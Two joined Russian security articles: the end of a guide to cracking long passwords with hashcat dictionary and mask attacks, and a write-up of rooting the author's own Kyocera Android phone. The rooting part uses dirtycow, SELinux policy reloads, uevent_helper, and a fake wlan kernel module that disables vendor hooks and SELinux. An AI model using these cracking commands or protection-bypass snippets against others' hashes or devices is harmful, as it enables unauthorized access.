    Теперь создадим новый словарь и набор масок. Мы уже знаем, что среднее английское слово занимает 4.79 символов, и поэтому будем создавать словарь, содержащий элементы не более 5 символов. Данный словарь будет сгенерирован на базе файла rockyou.txt, где у каждого элемента будут отрезаны первые 5 знаков. Далее удаляются дубликаты, и полученный список сортируется и помещается в файл first5_dict.txt. Полученный словарь занимает 18 МБ, что слишком мало для атаки на быстрый алгоритм MD5, но вполне приемлемо для более медленного хеша.

    Пример
    cut -c 1-5 rockyou.txt | sort -u > first5_dict.txt

    Затем мы будем комбинировать элементы словаря first5_dict.txt и маски из файла rockyou-1-60, который идет в комплекте с Hashcat. Некоторые кандидаты будут менее 12 символов, но вы можете исключить маски, длиной менее 7 символов и создать новый файл с расширением .hcmask. Вновь берем случайный пароль Alty5 из файла first5_dict.txt и добавим случайную последовательность цифр 9402847. В итоге получаем пароль Alty59402847.

    Пример
    hashcat -a 6 -m 0 hash.txt first5_dict.txt rockyou-1-60.hcmask
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-08_at_11.03.14_AM_knmj2x.png
    Рисунок 6: Время подбора пароля Alty59402847

    Эта атака особенно эффективна против пользователей, которые любят пароли, где распространенное слово сочетается с цифрами в целях рандомизации. Подобный пароль подбирается в течение 30 минут.

    Прямая атака по маске на пароль 12 и более символов

    Я понимаю, что данный тип атак не относится к гибридным, но, тем не менее, использование 12  символьных и более масок все еще дает результаты особенно, если пользоваться утилитой PACK. Атака на пароль, закодированный определенным алгоритмом хеширования, может быть запланирована длительностью 1 день (86400 секунд) с учетом скорости аппаратных средств. Вначале нужно измерить скорость перебора, исходя из возможностей вашего оборудования, при помощи команды hashcat -b -m #type прямо в терминале. Быстро разберем создание масок для атаки на пароли длиной 12-15 символов при помощи утилиты PACK. Для генерации масок вновь воспользуемся словарем rockyou.txt, но вначале оценим скорость перебора хешей md5.

    Пример (md5)
    hashcat -b -m 0
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-08_at_11.04.04_AM_ccwoe5.png
    Рисунок 7: Оценка скорости перебора хешей md5

    По результатам тестирования выяснилось, что скорость перебора - 76,000,000,000 ключей в секунду. Далее создаем набор масок на базе словаря rockyou.txt при помощи утилиты PACK.

    Пример
    python statsgen.py rockyou.txt -o rockyou.masks

    Теперь создаем файл hcmask, при помощи которого часть паролей длиной 12-15 символов будут перебираться в течение 1 дня (86400 секунд).

    Пример
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-08_at_11.07.36_AM_slriec.png
    Рисунок 8: Процедура подбора паролей по маске

    Затем мы можем запустить серию атак по маскам, используя файл rockyou_12-15.hcmask, для перебора хешей md5. Промежуточные переборы будут завершаться спустя 1 день.

    Пример
    hashcat -a 3 -m 0 hash.txt rockyou_12-15.hcmask

    Заключение

    Как вы могли убедиться, пароли длиной 12 символов не являются настолько неуязвимыми. Требуется лишь немного хитрости и творчества для выработки правильной стратегии перебора. Кроме того, не думайте, что если пароль более 11 символов, то ваш любимый онлай-сервис захеширует все правильно. Спасибо компании Yahoo. Я надеюсь, что примеры выше убедили вас, что нужно использовать пароли несколько сложнее, чем просто комбинация случайных слов в нижнем регистре. Другие доказательства приведены в статье моего друга Троя Ханта. Если вы достаточно умны, то начнете использовать приложение-менеджер, например, 1Password или Keepass, предназначенное для генерации и хранения паролей. Кроме того, я бы хотел упомянуть микроблог Dumpmon, где можно поискать хеши в исследовательских целях.

    Напоследок хочу привести следующую цитату: «Успешный кибер-генерал перед началом проникновения в систему выполняет множество вычислений в терминале» (CyberSunTzu).

    orig: 2017-01-23 07:34:00 / http://www.securitylab.ru/analytics/485097.php (click post title)



    Ломаем Android. Как глубока кроличья нора?

    image

    Мой первый Android телефон Galaxy Note N7000 был приобретен сразу после анонса в октябре 2011 года. Благодаря одному немецкому умельцу под ником bauner, у меня была возможность использовать последнюю версию CyanogenMod (ныне LineageOS). До тех пор, пока полтора года назад телефон не умер от китайской автомобильной зарядки.

    Замену искал долго и остановился на Kyocera (да, они и телефоны выпускают) KC-S701. Он отличается брутальным внешним видом и отсутствием сенсорных кнопок. О root доступе к телефону я тогда даже и не задумывался, полагая, что нынче каждый телефон тем или иным способом имеет возможность получения root. И найдется умелец, который сможет под него портировать CyanogenMod. Я ошибался.

    За полтора года было выпущено всего одно обновление — фикс падения ядра от специально сформированного ping пакета. А Android KitKat уже год назад был не первой свежести. Root доступ на этот телефон так никто и не получил, и никакой информации о нем не было. Отмечу, что тоже самое железо используется в американской версии телефона Kyocera Brigadier E6782, в котором по-умолчанию активизирован режим fastboot и нет ограничения на запуск неподписанных ядер (именно запуск, а не прошивку, и только при использовании непропатченного bootloader'а, CVE-2014-4325) и присутствует возможность загружаться в эти режимы путём зажатия кнопок телефона. Стараниями Verizon (а может Kyocera?) версия Android на Brigadier была обновлена до Lollipop.

    Итак, я решил разобраться с процессом получения root на Android самостоятельно.

    Два месяца назад я ничего не знал об устройстве Android (а сейчас я еще больше не знаю). Большую часть знаний пришлось добывать изучением исходных кодов и экспериментами, т.к. информации о взломе Android в интернете очень мало. Последующее описание справедливо для Android 4.4 KitKat, но не исключено, что оно заработает и на более новых версиях.

    Хочу обратить ваше внимание на то, что в данном обзоре описан исключительно мой конкретный опыт взлома Android на конкретной модели телефона, поэтому будьте предельно осторожны с его применением в своей практике, если не хотите внезапно получить мертвый телефон. Перед началом исследований я рекомендую забыть о том, что вы пользуетесь взламываемым телефоном в повседневной жизни и сделать backup с последующим hard reset. Это обезопасит ваши данные при совершении ошибки.

    В статье описаны не только действия, которые привели к успеху, но и ошибки. Надеюсь, что мои попытки докопаться до истины и многочисленные грабли будут вам интересны.

    Все исследования проводились в Linux окружении.


    Простыми словами dirtycow (рабочий эксплойт под Android) позволяет заменить память любого процесса (полезно, если хорошо знаешь ASM) или любой доступный для чтения файл, даже если он находится на readonly файловой системе. Желательно, чтобы подменяемый файл был меньше либо равен по размеру заменяемому. Основная атака в dirtycow для Android — подмена /system/bin/run-as — подобие sudo для отладки приложений. Начиная с API android-19 (таблица соответствия версий API и Android) /system/bin/run-as имеет CAP_SETUID и CAP_SETGID capabilities флаги (в старых версиях используется обычный suid bit — 6755).

    $ getcap bin/run-as 
    bin/run-as = cap_setgid,cap_setuid+ep

    Если файловая система будет примонтирована в режиме read-write, то всё, что dirtycow подменяет, окажется на файловой системе. Потому необходимо сделать backup оригинального файла и восстановить его после получения доступа, либо не перемонтировать файловую систему в режиме read-write. Как правило раздел /system в Android по умолчанию примонтирован в режиме read-only.

    Не зря dirtycow считается одной из серьезнейших уязвимостей, обнаруженных в Linux. И при наличии знаний с помощью dirtycow можно обойти все уровни защиты ядра, в том числе и SELinux.


    Для начала можно почитать как работают контексты SELinux. Неплохая статья на wiki Gentoo: https://wiki.gentoo.org/wiki/SELinux/Tutorials/How_does_a_process_get_into_a_certain_context

    Если коротко, то:



    Единственный доступный способ получения относительно привилегированного shell в production устройствах Android — developer mode. Developer mode запускает демон adbd, который может выступать в том числе и как аналог ssh/telnet. В Android KitKat он находится в initramfs по пути /sbin/adbd и не доступен для чтения для не-root пользователей. Изначально adbd запускается под пользователем root и работает в SELinux контексте/домене init (используется процессом init и как правило имеет больше привилегий, чем другие домены). Если в /init.rc явно указан контекст процесса, например seclabel u:r:adbd:s0, то процесс запускается сразу в указанном контексте. При инициализации adbd в зависимости от параметров компиляции (user, userdebug или eng и параметров Android (properties) понижает привилегии, а именно меняет текущего пользователя с root на shell, устанавливает SELinux context в shell и урезает все системные capabilities кроме CAP_SETUID и CAP_SETGID (что требуется для отладки приложений через run-as). Так называемый Capability Bounding Set не позволяет дочерним приложениям повышать capabilities, только понижать. Эти привилегии позволяют делать на телефоне чуть больше, чем ничего. Просмотреть capabilities текущего процесса можно командой cat /proc/self/status | grep CapBnd. А расшифровать их можно с помощью команды capsh (не доступна на Android), например:

    $ capsh --decode=0000001fffffffff

    Текущий SELinux context можно просмотреть командой id или cat /proc/self/attr/current. Предыдущий контекст процесса можно просмотреть командой cat /proc/self/attr/prev.

    Просмотр context'а файлов: ls -Z
    Просмотр context'а запущенных процессов: ps -Z



    root, да не тот

    Первое, что я сделал это использовал dirtycow по прямому назначению — подменил /system/bin/run-as, который задал UID/GID в 0 (тоже самое делает su). Однако монтировать файловую систему я не мог, даже tmpfs. Загружать модули ядра я тоже не мог. Просматривать dmesg — нет. Я даже не мог просматривать директории, которые имели права 700 и принадлежали другим системным пользователям. Я мог лишь читать и писать в блочные устройства, а просмотр файлов или директорий был возможен благодаря заданию UID/GID определенного пользователя (написал свой велосипед — аналог su, который мог задавать selinux context и пользователя/группу).

    Первым делом я сделал дамп всей прошивки, boot и recovery:

    $ dd if=/dev/block/mmcblk0 of=/storage/sdcard1/mmcblk0.img
    $ dd if=/dev/block/platform/msm_sdcc.1/by-name/boot of=/storage/sdcard1/boot.img
    $ dd if=/dev/block/platform/msm_sdcc.1/by-name/recovery of=/storage/sdcard1/recovery.img

    Изучить дамп можно утилитами kpartx и unpackbootimg. Команда kpartx -a mmbblk0.img создает виртуальное блочное устройство, доступное по пути /dev/mapper/loop0. С ним можно работать как с любым другим блочным устройством. Дампы разделов boot и recovery распаковал утилитой unpackbootimg.

    Потом попробовал записать в recovery /dev/zero, проверить и сразу восстановить из дампа.

    Раз я мог писать в блочные устройства, значит я мог записать custom recovery. Нашел TWRP от Brigadier, прошил в recovery и перезагрузился в него adb reboot recovery. TWRP я не увидел, а лишь иконку Android'а с восклицательным знаком. Так выглядит стандартный recovery, а значит TWRP не прошился.

    Перезагружаюсь в обычный режим, запускаю эксплойт, проверяю hash recovery раздела — hash соответствует оригинальному. Пробую записать данные опять — hash поменялся! Вспоминаю про page cache, чищу (echo 3 > /proc/sys/vm/drop_caches) — hash старый. Т.е. всё, что я пишу в блочное устройство улетает без ошибок в /dev/null и иногда оседает в Linux cache. Но обновление прошивки ведь как-то происходит? И пользовательские данные как-то записываются во внутреннюю память. Надо копать дальше.


    Пробуем отключить SELinux

    На тот момент я думал, что все ошибки об отсутствии привилегий вызваны SELinux (я полностью забыл о том, что могут быть урезаны capabilities). Логов dmesg я не видел, logcat ничего релевантного не показывал. И я начал думать как отключить SELinux.

    Первая зацепка, которую я смог найти:

    $ grep -A2 reload_policy boot/ramfs/init.rc 
    on property:selinux.reload_policy=1
        restart ueventd
        restart installd

    Исходники говорят о том, что при изменении этой опции, init перезагружает политики SELinux из файла /sepolicy.

    Т.е. я при помощи dirtycow могу перезаписать /sepolicy и командой setprop selinux.reload_policy 1 загрузить обновленную политику.

    Для начала нужно выяснить что из себя представляет /sepolicy. Изучить его можно с помощью команды sesearch (пакет setools в Debian).

    $ sesearch --allow sepolicy
    $ sesearch --neverallow sepolicy
    $ sesearch --auditallow sepolicy
    $ sesearch --dontaudit sepolicy

    В моём случае /sepolicy содержал только allow, что значит — при enforcing режиме SELinux в Android разрешено делать только то, что объявлено в политике. А процессу init разрешалось только загружать политику, но не отключать:

    $ sesearch --allow sepolicy | grep 'load_policy'
       allow init kernel : security load_policy ;

    Моей задачей было — разрешить init контексту задать selinux->enforce в permissive (setenforce 0).

    Первое, что я сделал — собрал стандартную политику стокового Android, подменил оригинальный /sepolicy, загрузил (под root пользователем setprop selinux.reload_policy 1) и получил сообщение в статусной строке, что телефон находится в незащищенном режиме. После этого телефон отказывался запускать приложения, стал очень задумчив, задать permissive режим мне тоже не удалось и в конечном итоге телефон перезагрузился. Отрицательный результат тоже результат, замена /sepolicy сработала.

    Первая же мысль: стоковая политика не подходит этому телефону и он при отсутствии прав начинает тупить.

    Я собрал новую политику, в которой просто описал все существующие SELinux context и объявил их permissive. Тоже не помогло.

    Потом я решил пересобрать политику и по возможности добавить привилегии для shell контекста.

    Я нашел статью, в которой говорится как "декомпилировать" политику. Немного повозившись я смог собрать все зависимости и запустить утилиту sedump. На выходе я получил текстовый файл, который я смог собрать обратно (для KitKat checkpolicy -M -c 26 -o sepolicy.new policy.conf) и даже получить файл с точно таким же размером что и оригинальный sepolicy, но разным hex содержимым. Загрузка новой политики вызвала точно такие же результаты, что и ранее — телефон через какое-то время перезагружался.

    Я решил собрать две политики: из policy.conf, который я получил и из policy.conf, в котором добавлены все привилегии для allow init kernel : security, в том числе и setenforce. Сравнить файлы в hex и по аналогии заменить байты в оригинальном sepolicy.

    Как выяснилось две пересобранные политики отличались всего парой байт. Я начал искать похожие совпадения в оригинальном sepolicy, но не нашёл. Затем я просто написал brute force скрипт, который в заданном диапазоне смещений заменяет два байта на "0xFF,0xFF", запускает sesearch --allow | grep "нужный результат". Таким образом я нашел необходимое смещение в оригинальной политике, заменил байты, подменил оригинальную политику и ничего. Отключить selinux опять не удалось.

    Чуть позже я нашел утилиту sepolicy-inject, которая добавляет привилегии в уже скомпилированный sepolicy файл. Если правило уже существует, то добавление максимальных привилегий не увеличивает конечный размер политики. К сожалению запуск утилиты добавляет всего одно правило за раз. Написал скрипт, который добавляет максимальные привилегии для каждого правила. Результатом был файл с политикой, в которой каждое правило содержало максимальные привилегии. Размер файла совпадал с оригинальным. И это опять не помогло.

    Потом я узнал, что в Android есть команда load_policy, которая перезагружает политику по любому пути. Танцы с бубном оказались лишними.

    adb shell run-as /data/local/tmp/run -u system -c u:r:init:s0 load_policy /data/local/tmp/sepolicy.new

    Можно было добавить любой permissive домен, загрузить новую политику и работать в контексте этого домена (кстати, supersu от chainfire для новых версий Android так и работает). Но даже это не дало возможности отключить SELinux. Я решил копать в другом направлении.


    Копаем recovery

    image

    Проверяю разницу между boot и recovery разделами. Все идентично кроме initramfs. В initramfs раздела recovery изучаю init.rc, в котором описан лишь один сервис, который запускает /sbin/recovery. Изучаю strings sbin/recovery | less, затем исходники оригинального recovery. Как видно, по умолчанию recovery просто отображает логотип Android. А если необходимо что-то сделать, то в штатном режиме в раздел /cache записывается файл /cache/recovery/command, который может содержать параметры запуска recovery. Если в этот файл записать --show_text то мы должны увидеть меню.

    Запускаю dirtycow exploit, выставляю UID/GID, записываю файл и запускаю adb reboot recovery. Телефон перезагружается и я попадаю в меню стандартного recovery. Уже что-то. Пробую прошить ZIP файл с supersu через adb sideload. Операция прерывается с ошибкой. Толком не смотрю на ошибку, а лезу в код recovery и ищу место, отвечающее за проверку цифровой подписи ZIP файла.

    Выясняю, что initramfs содержит публичный ключ res/keys в формате minicrypt, которым проверяется цифровая подпись ZIP файла. Оказалось это стандартный тестовый ключ Android, и что я могу подписать этим ключём любой архив. Проверить это можно следующим образом:

    java -jar dumpkey.jar android/bootable/recovery/testdata/testkey.x509.pem > mykey
    diff -u mykey res/keys

    Попробовал установить ZIP напрямую с sdcard, но в recovery при монтировании sdcard возникала ошибка. Изучил etc/recovery.fstab, оказалось что в режиме recovery sdcard монтируется как vfat:

    $ grep mmcblk1 recovery/ramfs/etc/recovery.fstab 
    /dev/block/mmcblk1p1                              /sdcard           vfat    nosuid,nodev,barrier=1,data=ordered,nodelalloc                  wait

    Моя 64Gb флэшка была отформатирована в exfat. Нашел старую sdcard на 2Gb, отформатировал её как vfat, записал ZIP, вставил её в телефон. Recovery в этот раз смог примонтировать карточку и я мог просматривать её содержимое на телефоне. Однако при установке ZIP опять возникла ошибка: E:failed to set up expected mounts for install; aborting.

    Команда strings recovery показала, что этот recovery отличается от стокового, по крайней мере там присутствовали строки, относящиеся к Kyocera, и скорее всего к чистке раздела /data. Покопавшись в оригинальных исходниках я выяснил, что интересующая меня ошибка возникает в функции setup_install_mounts в файле roots.cpp.

    Т.е. перед тем как применить ZIP, recovery отмонтирует все разделы, но в моём случае что-то идёт не так.


    Копаем исходники ядра

    Лицензия GPL обязывает производителей смартфонов выкладывать исходники ядра. Спасибо Линусу и Столлману за это. Иногда производители выкладывают что-то левое, иногда правильные исходники, но без defconfig файла, иногда правильные и очень редко с инструкцией как их собирать (например LG).

    В моём случае были исходники с правильным defconfig но без инструкции. Немного попотев я смог собрать ядро и убедился, что это не полная липа.

    Через продолжительное время я остановился на двух файлах:



    hooks

    Kyocera долго не думала, а просто запилила хуки на потенциально опасные операции в Android: mount, umount, insmod (к загрузке разрешен всего один модуль — wlan и только если его загрузит init процесс), и прочее. Вот где крылась проблема recovery. Он не мог отмонтировать файловую систему /system! Эти операции позволялись только init процессу. В том числе я не мог отключить SELinux потому что эта возможность была отключена при компиляции ядра. Обойти эти хуки можно было только, если ядро загружено с определенными параметрами (kcdroidboot.mode=f-ksg или androidboot.mode=kcfactory, о них чуть позже).


    restart

    Тоже интересный для изучения файл. В нем описываются возможные варианты загрузки телефона:


    Немного о том, как происходит загрузка на телефонах с процессором Qualcomm:

    Встроенный ROM загрузчик Qualcomm (pbl — primary bootloader) загружает раздел sbl1 (secondary bootloader). sbl1 загружает tz (trust zone), затем aboot (android boot, little kernel, lk). Aboot в свою очередь загружает boot, recovery или fota.

    Описание разделов, участвующих при загрузке:


    Все эти разделы подписаны цепочкой сертификатов.


    fota

    В некоторых случаях полезно игнорировать обновления прошивки.

    FOTA — firmware over the air. В отличие от boot и recovery, fota — это неофициальный режим загрузки Android. Задача fota — обновить прошивку. В Kyocera для этого используется решение от компании Red Bend, которое в 35Mb умещает обновление не только ядра но и раздела /system. Потому запись в раздел /system запрещена, иначе наложение патча на неправильные данные может окирпичить телефон.

    На мой телефон имелось обновление. Отважиться на него я мог потому, что я уже имел возможность писать в /cache и прервать обновление в любой момент.

    Изучив исходники отвечающего за обновление Java приложения, мне стало ясно как оно происходит:


    Перезагрузка происходит не моментально, значит у меня есть возможность удалить файл перед перезагрузкой и посмотреть что происходит с разделом fotamng.

    Пишу команду, которая непрерывно делает дамп раздела и переименовывает /cache/delta/boot_delta.bin. Запускаю её сразу после соглашения о перезагрузки телефона. Телефон перезагружается в режим FOTA, рапортует об отсутствии обновления и перезагружается в обычный режим.

    Начинаю изучать данные, которые сдампил. В разделе /cache бонусом получаю логи fota, в которых даже есть логи dmseg! Сама перезагрузка в fota инициализируется байтами "1" в разделе fotamng:

    $ dd if=/data/local/tmp/one_bit.bin of=/dev/block/platform/msm_sdcc.1/by-name/fotamng seek=16 bs=1 count=1
    $ dd if=/data/local/tmp/one_bit.bin of=/dev/block/platform/msm_sdcc.1/by-name/fotamng seek=24 bs=1 count=1
    $ dd if=/data/local/tmp/one_bit.bin of=/dev/block/platform/msm_sdcc.1/by-name/fotamng seek=131088 bs=1 count=1
    $ dd if=/data/local/tmp/one_bit.bin of=/dev/block/platform/msm_sdcc.1/by-name/fotamng seek=131096 bs=1 count=1

    После перезагрузки они обнуляются. В dmesg я обратил внимание на наличие параметра ядра kcdroidboot.mode=f-ksg. Вот оно! Т.е. загрузчик снимает защиту для fota. И чисто теоретически, если я запишу раздел boot в fota и перезагружу телефон в этот режим, то я получу ядро с отключенной защитой Kyocera. Но писать в системные разделы я всё еще не могу.


    Изучение исходников little kernel (lk)

    То, что находится в разделе aboot — загрузчик Android, ванильные исходники которого находятся по адресу: https://source.codeaurora.org/quic/la/kernel/lk/

    Там можно найти и информацию как происходит загрузка в некоторые из режимов. Например я нашел информацию о том, что если в раздел misc записать "boot-recovery", то перезагрузиться в recovery можно без adb reboot recovery. При загрузке в recovery эта метка обнуляется. И если recovery загрузиться не может, то телефон попадёт в boot loop и вы его потеряете. Так что будьте осторожны, а лучше избегайте этого варианта перезагрузки.

    Там же можно найти код, который переводит системную область emmc в режим read-only. Ответ на вопрос, почему невозможно перезаписать recovery. Эту защиту можно отключить из ядра Linux , если написать соответствующий модуль ядра. Уже всё написано товарищем из страны восходящего солнца, который, похоже, тоже неровно дышит к телефонам компании Kyocera. Модуль с первого раза не сработал, иногда подвешивает mmc в claim mode. Возможно не всё так однозначно и требуется детальное исследование.

    Вот так происходит проверка подписи загрузочных разделов: https://source.codeaurora.org/quic/la/kernel/lk/tree/platform/msm_shared/image_verify.c?h=LA.BR.1.3.3_rb2.29



    dmesg

    Google мне помог ответить на вопрос, почему я не могу прочитать логи ядра: /proc/sys/kernel/dmesg_restrict. Значение этого параметра задается в 1 во время загрузки телефона. Если у пользователя нет CAP_SYS_ADMIN capability, то логи ему не доступны.


    uevent_helper

    В моём случае, на удивление, была возможность задать /sys/kernel/uevent_helper. Если в этот параметр записать путь до executable файла (shell script тоже сойдёт), то он с определенным интервалом будет запускаться от процесса init в контексте init и что самое важное с full capabilities.

    Я написал скрипт:

    #!/system/bin/sh
    echo 0 > /proc/sys/kernel/dmesg_restrict

    Загрузил его на телефон и записал его путь в /sys/kernel/uevent_helper. У меня появилась возможность видеть dmesg!


    Патченный adbd

    image

    Т.к. мне надоело иметь доступ к урезанной консоли Android, а патчить бинарник adbd мне лень, то я решил собрать свой adbd с блэкджеком и шлюхами. Для этого пришлось скачать 70 Gb исходников Android, чтобы не возиться с каждой зависимостью по отдельности. Убрал проверку при которой происходит урезание capabilities, скомпилировал, подменил /sbin/adbd и получил полноценную root консоль. Теперь я могу монтировать файловые системы, смотреть dmesg без отключения dmesg_restrict, спокойно просматривать и редактировать файлы, которые не принадлежат root и многое другое. Но я пока не могу монтировать /system раздел и загружать модули в ядро.

    Кстати, этой процедуры можно избежать, скомпилировав lsh и подставить его путь в /sys/kernel/uevent_helper. Желательно обернув запуск lsh в скрипт, который задаёт PATH environment, иначе придется задавать полный путь к каждой команде.


    WiFi

    WiFi в моем телефоне работает через модуль ядра. WiFi включен — модуль загружен. WiFi выключен — модуль выгружен. Если подменить модуль на свой, то при включении WiFi должен загрузиться подставной модуль. На моё счастье цифровая подпись модулей не проверялась. Первое, что я попробовал, это собрать и загрузить модуль, который отключает SELinux путем замены памяти ядра на Amazon Fire Phone: https://github.com/chaosmaster/ford_selinux_permissive

    Чтобы собрать модуль, требуется более-менее соответствующие исходники ядра и файл Module.symvers. Если исходники точно соответствуют тому ядру, что используется на телефоне, то Module.symvers, сгенерированный автоматически при сборке ядра должен подойти.

    Если при загрузке модуля ядро будет ругаться (disagrees about version of symbol module_layout), то потребуется извлечь Module.symvers из boot раздела. Это можно сделать, используя скрипт https://github.com/glandium/extract-symvers:

    $ unpackbootimg -i boot.img -o boot
    $ extract-symvers.py -e le -B 0xc0008000 boot/boot.img-zImage > %PATH_TO_KERNEL%/Module.symvers

    Нельзя просто так взять и собрать свой модуль для телефона Kyocera.

    image

    Помните список доступных для загрузки модулей? Модуль должен называться wlan и никак иначе. Решается это просто:


    ...
    MODULE_NAME = wlan
    ...

    Модуль на удивление загрузился (память, которую занимает модуль wlan сократилась, проверяется командой lsmod), но SELinux не отключился.

    В dmesg не было никакой информации от подставного модуля. А всё потому, что у ядра есть еще один параметр: /proc/sys/kernel/printk, который фильтрует INFO логи, в том числе модулей. Я понизил порог всех логов: echo '8 8 8 8' > /proc/sys/kernel/printk. Перезагрузил модуль и увидел, что модуль просто не нашел требуемой маски, потому отключить SELinux не удалось.

    Единственное, что я не уяснил, как программно вызвать отключение и включение WiFi. Мне приходится выключать/включать WiFi вручную через интерфейс Android.


    Пишем свой модуль
    Снимаем защиту

    SELinux отключить не удалось, но по аналогии с модулем https://github.com/chaosmaster/ford_selinux_permissive можно попробовать сделать тоже самое, но с Kyocera hooks. Мне нужно лишь задать переменную kc_bootmode или kc_kbfm в единицу.

    В ядре Linux есть возможность получить адреса указателей всех функций и переменных: cat /proc/kallsyms. По умолчанию эти адреса отображаются как 0. Это работает очередная защита ядра. Отключить её можно так: echo 0 > /proc/sys/kernel/kptr_restrict.

    Получив адрес нужной функции, я мог передать в неё параметр и функция задаст переменную в 1. Опытным путем выяснил, что не все ядра отображают kallsyms для переменных (тип d или D, регистр говорит глобальная переменная или нет), поэтому в примерах я использую указатели на функции. Возможно это определяется опцией CONFIG_KALLSYMS_ALL при компиляции ядра.

    $ adb shell "grep kc_bootmode_setup /proc/kallsyms"
    c0d19d84 t kc_bootmode_setup

    Описываю функцию в модуле:

    int (*_kc_bootmode_setup)(char *buf) = (int(*)()) 0xc0d19d84;

    И вызываю её:

    _kc_bootmode_setup("f-ksg")

    Можно адреса найти динамически:

    _kc_bootmode_setup = (int (*)(char *buf))kallsyms_lookup_name("kc_bootmode_setup");

    Загрузка подставного модуля отключила встроенную защиту! Теперь я могу монтировать /system и загружать любой модуль ядра независимо от его имени.

    Системная область emmc всё еще доступна только для чтения и не позволяет редактировать /system раздел на постоянной основе. Файлы редактируются, но при очистке cache все возвращается в исходное состояние.


    Всё-таки отключаем SELinux

    Из спортивного интереса я всё-таки решил отключить SELinux. Заменить defined значение selinux_enabled мы не можем, но мы можем разыменовать структуру с hooks функциями security_ops.

    Это делается вызовом функции reset_security_ops:

    void (*_reset_security_ops)(void) = NULL;
    ... ... ...
    _reset_security_ops = (void (*)(void))kallsyms_lookup_name("reset_security_ops");
    if (_reset_security_ops != NULL) {
      _reset_security_ops();
    }

    После этого защита SELinux работать не будет, но система всё еще будет думать, что она включена. Потому возможны некоторые ошибки в работе системы.


    Перезагружаемся в download mode
    int (*_enable_dload_mode)(char *str) = (int(*)()) 0xc0d0cc18;
    ... ... ...
    _enable_dload_mode("dload_mode");

    Та же операция работает и с download_mode, о котором я писал выше. После загрузки модуля телефон перезагружается в спец режим, который работает как usb mass storage device. Т.е. я имею доступ ко всем разделам телефона без защиты от чтения! Попробовал записать свой recovery.

    Пришлось ограничить скорость записи, иначе телефон отваливается и запись прекращается. Возможно это результат переполнения кэша mass storage загрузчика. Пришлось написать хак:

    BS=512
    nextblock=0
    IMG=my-recovery.img
    DEST=/dev/sdb12
    # 64 - total amount of 512*512b blocks for 16Mb partition (16Mb*1024*1024/(512*512))
    for i in {1..64}; do
      echo $i
      echo dd if=${IMG} of=${DEST} bs=${BS} seek=${nextblock} skip=${nextblock} count=${BS} oflag=direct
      dd if=${IMG} of=${DEST} bs=${BS} seek=${nextblock} skip=${nextblock} count=${BS} oflag=direct
      nextblock=$((nextblock+BS))
      echo "nextblock = ${nextblock}"
      sleep 0.5
    done
    sync
    echo 3 > /proc/sys/vm/drop_caches

    Загрузил телефон, выполнил adb reboot recovery и ничего. Только вибрация с последующей обычной загрузкой. Помните про раздел misc, не стоит проверять recovery через запись в этот раздел.

    При помощи этого же способа я примонтировал /system раздел к компьютеру и вручную записал на него supersu. Первоначальная задача выполнена: перманентный root доступ получен. Осталось автоматизировать загрузку подставного WiFi модуля, который отключает hooks. И хорошо бы, чтобы WiFi после этого оставался работоспособным. А еще лучше разблокировать загрузчик, чтобы загружать своё ядро.

    Для начала можно изучить какие средства применялись для разблокировки других телефонов. При беглом поиске я обнаружил лишь следующие два, к тому же устаревшие:



    Цифровая подпись aboot и boot разделов

    Я пытался выяснить каким публичным ключём подписаны boot образы. Распаковал ключи из aboot (binwalk -e aboot), извлек подписи из образов и прошелся всеми публичными ключами по ним. Выяснил, что все образы подписаны одни ключём. С ходу не разобрался как вычислить смещение подписи у boot разделов, потому я просто перепаковываю образ и использую его размер как смещение. С aboot чуть сложнее. Мне удалось извлечь подпись и расшифровать sha256 образа. А вот понять как самому вычислять sha256, чтобы сравнить с расшифрованным значением, пока не удалось.

    #!/bin/bash
    
    # print der certificate:
    # openssl x509 -inform der -in 0xff.crt -text -noout
    
    # mkdir boot
    # unpackbootimg -i 09-boot.img -o boot
    # cd boot
    # mkbootimg --kernel 09-boot.img-zImage --ramdisk 09-boot.img-ramdisk.gz --cmdline "`cat 09-boot.img-cmdline`" --base `cat 09-boot.img-base` --pagesize `cat 09-boot.img-pagesize` --dt 09-boot.img-dtb --kernel_offset `cat 09-boot.img-kerneloff` --ramdisk_offset `cat 09-boot.img-ramdiskoff` --tags_offset `cat 09-boot.img-tagsoff` --output mynew.img
    # dd if=../09-boot.img of=signature.bin bs=1 count=256 skip=$(ls -la mynew.img | awk '{print $5}')
    # cd ..
    # binwalk -e 05-aboot.img
    
    # extract aboot signature
    # dd if=05-aboot.img of=signature.bin bs=1 count=256 skip=$(od -A d -t x4 05-aboot.img | awk --non-decimal-data '/^0000016/ { i=sprintf("%d\n","0x"$3); print (i+40)}')
    
    # extract base aboot image
    # 40 - aboot header size, refer to: https://android.googlesource.com/kernel/lk/+/caf/master/target/msm8226/tools/mkheader.c#160
    # dd if=05-aboot.img of=aboot-base.img bs=1 count=$(od -A d -t x4 05-aboot.img | awk --non-decimal-data '/^0000016/ { i=sprintf("%d\n","0x"$3); print (i)}') skip=40
    # how sha256 was calculated?
    # openssl dgst -sha256 -sign private_key -out signature.bin aboot-base.img ?
    
    NAME=$1
    IMG=${NAME}/mynew.img
    SIG=${NAME}/signature.bin
    
    #IMG=aboot-base.img
    #SIG=signature.bin
    
    CALC_SHA256=$(sha256sum ${IMG} | awk '{print $1}')
    
    for i in `find . -name *.crt`; do
      ORIG_SHA256=$(openssl rsautl -inkey <(openssl x509 -pubkey -noout -inform der -in ${i} 2>/dev/null) -pubin -in ${SIG} 2>/dev/null | hexdump -ve '/1 "%02x"')
      if [ "${ORIG_SHA256}" != "" ]; then
        echo "sha256 was decrypted using ${i} key - ${ORIG_SHA256}"
      fi
      if [ "${ORIG_SHA256}" = "${CALC_SHA256}" ]; then
        echo "sha256 ${ORIG_SHA256}"
        echo "$i"
      fi
    done

    В качестве эксперимента я попробовал записать boot раздел в раздел fota, зная, что при загрузке fota снимаются все ограничения. Здесь я сильно рисковал, т.к. мог получить bootloop, похожий на bootloop recovery. Метка загрузки в fota записывается в раздел fotamng и если раздел не загрузится, то я получу бесконечную перезагрузку.

